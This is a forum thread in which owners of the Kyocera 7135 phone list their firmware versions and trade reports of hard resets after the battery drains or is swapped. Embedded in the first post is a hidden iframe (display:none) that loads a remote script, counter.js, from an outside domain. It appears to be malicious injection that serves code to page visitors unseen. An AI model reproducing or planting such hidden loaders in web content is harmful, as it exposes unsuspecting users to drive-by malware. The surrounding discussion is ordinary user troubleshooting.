+ Reply to Thread
Page 1 of 5 1 2 3 4 5 LastLast

Firmware version?

I'm just taking a survey of versions out there...

Mine are:

MZ 1.0.30
    SZ 1.0.17<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

hmm...
    mine is
    MZ 1.0.27
    SZ 1.0.13

interesting...
    i just got mine 2-3 weeks ago from getconnected without service...

mike

mine also...
    MZ 1.0.27
    SZ 1.0.13

Hey with your new firmware can you try this test and post the result?

Drained the battery until your screen said low battery, then continue to chat on the phone while plug the power source in.

When it happens to me, by the time I hung up. I notice the screen is black. I couldn't turn on the phone nor the palm. (And this is while it's still plug in the source) A simple softboot wouldn't do. What I had to do is remove the battery for a few minutes and charge the battery seperately on the docking station. And later place the battery in the phone. (this will hard reset the phone too) So my last phone log was wiped out.

This is a serious problem as even changing with a newly charged battery, I would have everything wiped out from everything I last did till my backup or hotsync.

I've done that and it works fine... are you sure its your firmware.

so low battery = stop talking??

ive read that if you remove (or are forced to remove) the battery with the phone on, it will cause a hard reset...
    ive personally removed my battery after carefully turning the phone off and then the palm with no bad results...
    ive even had reverse color crashes and after carefully(!) turning off the phone and palm (if possible after the crash) and soft resetting, i have had no ill effects...

knocking on artificial laminiated wood-product,
    mike

Originally posted by mxpeed
    so low battery = stop talking??

ive read that if you remove (or are forced to remove) the battery with the phone on, it will cause a hard reset...
    ive personally removed my battery after carefully turning the phone off and then the palm with no bad results...
    ive even had reverse color crashes and after carefully(!) turning off the phone and palm (if possible after the crash) and soft resetting, i have had no ill effects...

knocking on artificial laminiated wood-product,
    mike
    I have replaced my battery a half dozen times with the palm and phone on and all that happens is a soft reset. Even if I turn off the phone and Palm and pull the battery out, I get a soft reset. i have NEVER had to do a hard reset because of a battery swap. But I did do a hard reset in the past, testing some beta apps.

My info:

MZ 1.0.27
    SZ 1.0.13

I've gotten a hard reset when the battery was removed for a minute or so, but a quick change gives me a soft reset.

ajm

AJAM, what's the differences in new version you have compaired to the older that most of us seem to have...
    I'm on Verizon

ok, I have NEVER let the battery be left out of the phone for more than 10-15 sec. if that! So I guess what you are experiencing could defenatly be wide spread! If that is the case, that would be a huge design flaw (hardware or software ??) and hopefully it is resolved with the upgrades that Verizon is implementing. Because I'm sure there will be times that people may run down their batteries down to the level of NO JUICE and won't be able to get to a power source or battery swap untill later in the day and if a hard reset is the result then that would be a huge rude awakaning for both the user and the 7135 ! :O

Maybe I need to clearified on the no juice comment and changing battery result in hard reset.

First the scenerio, I was talking to my friend on my semi-fully charged (if that make any sense) 7135. If I done my calculations, we chatted for 4 hours straight with lcd light on and system is overclocked with afterburner @37mhz.

Then I received a beep, looked at the screen and it said "low battery" so while continue talking, I unplug my travel charger from the cradle and directly connect it to my 7135 so I would not get inturpted. (like hanging up) We chatted for another 1-1 1/2 hours latter, we finally hung up. So as I reach for the "Hung up" button, I notice my screen is all black. Tried pressing on the "light" button to no avail. Tried softreset. No luck (all this while phone is still plugged in) Too out battery and tried softreset. No good.

Since I experience a similar situation before when I forgot to charge my phone for the nite, I know what I had to do. So I unplug the quick charger and place it back on the cradle and plug the battery to charge. (letting the phone sitting on the table, powerless) for about 30 seconds later, I inserted the battery and the palm screen is back up and was hard resetted (no biggie, knew that would happen...only thing lost is the log of that last call since I hotsync earlier)

So my question was would the phone dies when there's no power and had to remove the battery, charge the battery (or replace with a fully battery) after 10-30 seconds of powerless 7135 in order to resurrect it on the new firmware.

Originally posted by nl4jy
    Maybe I need to clearified on the no juice comment and changing battery result in hard reset.

First the scenerio, I was talking to my friend on my semi-fully charged (if that make any sense) 7135. If I done my calculations, we chatted for 4 hours straight with lcd light on and system is overclocked with afterburner @37mhz.

Then I received a beep, looked at the screen and it said "low battery" so while continue talking, I unplug my travel charger from the cradle and directly connect it to my 7135 so I would not get inturpted. (like hanging up) We chatted for another 1-1 1/2 hours latter, we finally hung up. So as I reach for the "Hung up" button, I notice my screen is all black. Tried pressing on the "light" button to no avail. Tried softreset. No luck (all this while phone is still plugged in) Too out battery and tried softreset. No good.

Since I experience a similar situation before when I forgot to charge my phone for the nite, I know what I had to do. So I unplug the quick charger and place it back on the cradle and plug the battery to charge. (letting the phone sitting on the table, powerless) for about 30 seconds later, I inserted the battery and the palm screen is back up and was hard resetted (no biggie, knew that would happen...only thing lost is the log of that last call since I hotsync earlier)

So my question was would the phone dies when there's no power and had to remove the battery, charge the battery (or replace with a fully battery) after 10-30 seconds of powerless 7135 in order to resurrect it on the new firmware.
    First question: 5-5.5 hrs of talking!!! What the heck did you have to talk about!

Second Question: Not a big deal because of a hard reset ?? Most people will be overly pissed including me if I had to do a hard reset after something like that especially if I diddn't HotSync or use a backup program for the day and was activly using the palm out on the field when this happens!

Thirs Question:

"So my question was would the phone dies when there's no power and had to remove the battery, charge the battery (or replace with a fully battery) after 10-30 seconds of powerless 7135 in order to resurrect it on the new firmware."

What ????:conf

Originally posted by babacksh
    First question: 5-5.5 hrs of talking!!! What the heck did you have to talk about!

Second Question: Not a big deal because of a hard reset ?? Most people will be overly pissed including me if I had to do a hard reset after something like that especially if I diddn't HotSync or use a backup program for the day and was activly using the palm out on the field when this happens!

Thirs Question:

"So my question was would the phone dies when there's no power and had to remove the battery, charge the battery (or replace with a fully battery) after 10-30 seconds of powerless 7135 in order to resurrect it on the new firmware."

What ????:conf
    First of all, I used to talked for 8-12 hours straight before, so 5-5 1/5 is like nothing to me. Maybe you don't talk too much. But when you're on a interesting subject, time flies.

I know a hard reset IS a big deal. But during that time, it was no biggie to me cause I didn't do any activity except that call. But if that happens during the daytime, I'll break this thing.

Last, I want to know if the firmware would fix this problem. And the problem is "Will the become unusable and have to hard reset with the above procedures when the phone ran out of battery."

Hard to tell in regards to the Firmware fix and if this problem is solved untill someone tries this on the new firmwares, and not too many people have that new firmware as of yet.

Originally posted by babacksh
    Hard to tell in regards to the Firmware fix and if this problem is solved untill someone tries this on the new firmwares, and not too many people have that new firmware as of yet.
    But AJaM does, that's why I want him to try and post result.

Hard reset doesn't occur with my phone while the battery is out or do I have any of the aforementioned problems. I do know of another unit with my same version that has had some hard reset problems similar to those described above. It would appear this is a unit version or build issue rather than a software problem.

AJaM

I called Kyocera tech support last night about another issue. The tech told me the Verizon version of the phone will be out in less than two weeks. She also said it will have different firmware than the current Alltel verion. She suggested I take my phone to a Verizon store after the official release and have my phone flashed. She also said the Verizon version will have additional applications. She wouldn't tell me what those apps will be.

Any one have a new Verizon phone and know what software versions they have?

AJaM

I saw this in the Rumors thread...
    http://www.smartphonesource.com/vbul...pagenumber=207

Originally posted by 2nGlenn
    Just received my 7135 (Verizon version) from Getconnected today! Programming took about 3 minutes, just give Verizon the ESN behind the battery and the dial *228 option 1.

The firmware version is:

MZ 1.0.36
    SZ 1. 0.23

I am trying to get copies of this new firmware... Anyone yet go to Alltel for an upgrade? What version are they giving out now?

AJaM